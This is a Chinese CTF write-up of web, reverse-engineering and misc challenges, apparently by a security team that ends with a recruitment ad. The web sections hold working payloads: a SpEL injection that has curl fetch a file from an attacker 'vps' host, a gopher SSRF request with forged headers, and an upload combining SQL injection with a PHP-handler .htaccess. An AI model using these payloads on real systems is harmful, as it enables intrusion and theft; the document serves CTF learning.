第二屆網刃杯CTF-wp
- Web
-
- ez_java
- ezjs
- Sign_in
- upload
- Re
-
- ez_algorithm
- 定時啟動
- Re_function
- freestyle
- Misc
-
- easyiec
- Tip
Web
ez_java
package me.su;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import java.io.IOException;
import java.util.regex.Pattern;
public class demo {
public static void main(String[] args) {
String name = "#{new ProcessBuilder(new String[]{\"curl\",\"-o\",\"/tmp/1\",\"vps:901\"}).start()}";
if (blackMatch(name)) {
System.out.println("die");
return;
}
System.out.println(name);
System.out.println(getAdvanceValue(name));
}
public static String getAdvanceValue(String val) {
return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
}
private static boolean blackMatch(String val) {
for (String keyword : getBlacklist()) {
if (Pattern.compile(keyword, 34).matcher(val).find()) {
return true;
}
}
return false;
}
private static String[] getBlacklist() {
return new String[]{"java.+lang", "Runtime", "exec.*\\("};
}
}
ezjs
原題,來自https://www.anquanke.com/post/id/248170#h3-7
跟原題相比隻是增加了一個黑名單過濾,測試發現過濾了return、execSync、flag、sh、rm等等,其中return被過濾是以本題沒辦法直接回顯了,是以本題變成一個無回顯情況下的指令執行
最終使用如下payload利用wget外帶拿到flag:
flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}
Sign_in
http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41
import urllib.parse
test =\
"""POST /?a=1 HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Referer: bolean.club
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
b=1
"""
#注意後面一定要有回車,回車結尾表示http請求結束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = '_'+new
print(result)
upload
POST / HTTP/1.1
Host:
124.220.9.19:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1470817923043980331208184612
Content-Length: 391
Origin:
http://124.220.9.19:8001
Connection: close
Referer:
http://124.220.9.19:8001/
Upgrade-Insecure-Requests: 1
- ----------------------------1470817923043980331208184612
Content-Disposition: form-data; name="upfile"; filename="1a' or updatexml(1,concat(0x7e,(select substr(flag,16,32) from flag)),0) or'"
Content-Type: ctf
<FilesMatch "1.gif">
SetHandler application/x-httpd-php
AddHandler php5-script .gif
</FilesMatch>
- ----------------------------1470817923043980331208184612--
Re
ez_algorithm
繁瑣的一些移位,置換加密
char *__fastcall encryption(char *a1)
{
int v1; // eax
char v2; // al
char v3; // al
__int64 v4; // kr00_8
char v5; // al
char v6; // al
int v7; // eax
char v8; // al
char v9; // al
char v10; // al
char v11; // al
char v12; // al
char v14[1012]; // [rsp+20h] [rbp-60h] BYREF
int v15; // [rsp+414h] [rbp+394h]
const char *v16; // [rsp+418h] [rbp+398h]
const char *small; // [rsp+420h] [rbp+3A0h]
int v18; // [rsp+42Ch] [rbp+3ACh]
char *v19; // [rsp+430h] [rbp+3B0h]
char *v20; // [rsp+438h] [rbp+3B8h]
small = xyp2();
v16 = xyp3();
v20 = v14;
v19 = a1;
v18 = 0;
v15 = 1;
while ( v18 < strlen(a1) )
{
if ( *v19 <= 64 || *v19 > 90 )
{
if ( *v19 <= 96 || *v19 > 122 )
{
if ( *v19 == '_' )
{
switch ( v15 + rand() % 7 )
{
case 0:
*v20 = ':';
break;
case 1:
*v20 = '&';
break;
case 2:
*v20 = '+';
break;
case 3:
*v20 = '*';
break;
case 4:
*v20 = '\\\\';
break;
case 5:
*v20 = '?';
break;
case 6:
*v20 = '$';
break;
case 7:
*v20 = '#';
break;
default:
break;
}
}
else if ( *v19 <= 47 || *v19 > 57 )
{
*v20 = *v19;
}
else
{
v12 = encryption2(*v19);
*v20 = v12;
}
}
else // 小寫字母
{
v7 = v18 % 4;
if ( v18 % 4 == 1 )
{
v9 = encryption2(small[(*v19 - 97) * (v18 % 4)]);
*v20 = v9;
}
else if ( v7 > 1 )
{
if ( v7 == 2 )
{
v10 = encryption2(small[(*v19 - 97) ^ (v18 % 4)]);
*v20 = v10;
}
else if ( v7 == 3 )
{
v11 = encryption2(small[*v19 - 97 + v18 % 4]);
*v20 = v11;
}
}
else if ( !v7 )
{
v8 = encryption2(small[*v19 - 97 - v18 % 4]);
*v20 = v8;
}
}
}
else // 大寫字母
{
v1 = v18 % 4;
if ( v18 % 4 == 1 )
{
v3 = encryption2(v16[*v19 - 65 + v18 % 4]);
*v20 = v3;
}
else if ( v1 > 1 )
{
if ( v1 == 2 )
{
v4 = v18 * (*v19 - 65);
v5 = encryption2(v16[(((HIDWORD(v4) >> 30) + (unsigned __int8)v18 * (*v19 - 65)) & 3) - (HIDWORD(v4) >> 30)]);
*v20 = v5;
}
else if ( v1 == 3 )
{
v6 = encryption2(v16[(*v19 - 65) ^ (v18 % 4)]);
*v20 = v6;
}
}
else if ( !v1 )
{
v2 = encryption2(v16[*v19 - 65 - v18 % 4]);
*v20 = v2;
}
}
++v18;
++v19;
++v20;
}
return v14;
}
我們根據程式對數字,大寫字母,小寫字母的不同處理來寫處解密腳本:
s = list(b"WQUTYBXDOFVRKHCGSMLJAZENIP")
t = list(b"gskfcqtioutrvenjwlpmadybhx")
enc = "BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
"BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
enc = list(enc.encode())
for i in range(28):
if enc[i] >= 65 and enc[i] <= 90:
index = s.index(enc[i])
if i%4 == 0:
tmp = index+97
elif i%4 == 1:
tmp = index+97
elif i%4 == 2:
tmp = (index^2)+97
else:
tmp = (index-3)+97
enc[i] = tmp
elif enc[i] >= 97 and enc[i] <= 122:
index = t.index(enc[i])
if i%4 == 0:
tmp = index+65
elif i%4 == 1:
tmp = (index-1)+65
elif i%4 == 2:
tmp = (index^2)+65
else:
tmp = (index^3)+65
enc[i] = tmp
elif enc[i] >= 48 and enc[i] <= 57:
tmp = 105-enc[i]
enc[i] = tmp
print(bytes(enc))
#flag{w3Lc0mE#t0+3NcrYPti0N:}
最後這個是多解的,根據flag表示的意思,推出有 _ 進行連接配接。
組合得到flag
flag{w3Lc0mE_t0_3NcrYPti0N:}
定時啟動
修改系統時間在2022-04-24 09:09:09附近,不斷運作squid程式,且運作後删除在目前目錄生成的Readme.txt(因為測試出程式是通過判斷目前目錄下有無Readme.txt來判斷程式是不是第二次運作)
多次嘗試得到flag
Re_function
在壓縮包的注釋資訊中有一段資料,複制下來發現是一張圖檔,從圖檔最後看見一個base編碼,解碼即是壓縮包密碼。
第一個程式是加密程式
解密得到:SqcTSxCxSAwHGm/JvxQrvxiNjR9=
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> s = [s[i]^0x37 for i in range(0, 28, 2)]
>>> s
[83, 99, 83, 67, 83, 119, 71, 47, 118, 81, 118, 105, 106, 57]
>>> bytes(s)
b'ScSCSwG/vQvij9'
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> for i in range(28):
... if i%2 == 0:
... s[i] ^= 0x37
...
>>> s
[83, 113, 99, 84, 83, 120, 67, 120, 83, 65, 119, 72, 71, 109, 47, 74, 118, 120, 81, 114, 118, 120, 105, 78, 106, 82, 57, 61]
>>> bytes(s)
b'SqcTSxCxSAwHGm/JvxQrvxiNjR9='
然後第二個程式是一個變表base64解碼,把第一個程式解出的資料進行一個變表base64解碼就是flag。
freestyle
逆向fun1 與fun2得到兩次輸入要滿足以下條件fun1:( 4 * (3 * atoi(s) / 9 - 9) != 4400 )fun2:( 2 * (atoi(s) % 56) != 98 )并且題目提示需要求出MD5值寫出腳本 得到key。
key1=(4400/4+9)*3
key2=(98/2)+n*56
key=str(key1)[:-2]+str(key2)[:-2]
MD5:
import hashlib
def getmd5(str):
m = hashlib.md5()
m.update(str.encode("utf-8"))
return m.hexdigest()
for i in range (1,8):
key1=(4400/4+9)*3
key2=(98/2)+i*56
print(key1)
print(key2)
flag=''
key=str(key1)[:-2]+str(key2)[:-2]
print(getmd5(key))
Misc
easyiec
拿到流量包,直接strings:strings
./easyiec/easyiec.pcap |grep 'flag’得到flagflag{e45y_1eci04}
Tip
你是否想要加入一個安全團
擁有更好的學習氛圍?
那就加入EDI安全,這裡門檻不是很高,但師傅們經驗豐富,可以帶着你一起從基礎開始,隻要你有持之以恒努力的決心
EDI安全的CTF戰隊經常參與各大CTF比賽,了解CTF賽事,我們在為打造安全圈好的技術氛圍而努力,這裡絕對是你學習技術的好地方。這裡門檻不是很高,但師傅們經驗豐富,可以帶着你一起從基礎開始,隻要你有持之以恒努力的決心,下一個CTF大牛就是你。
歡迎各位大佬小白入駐,大家一起打CTF,一起進步。
我們在挖掘,不讓你埋沒!
你的加入可以給我們帶來新的活力,我們同樣也可以贈你無限的發展空間。
有意向的師傅請聯系郵箱[email protected](帶上自己的履歷,履歷内容包括自己的學習方向,學習經曆等)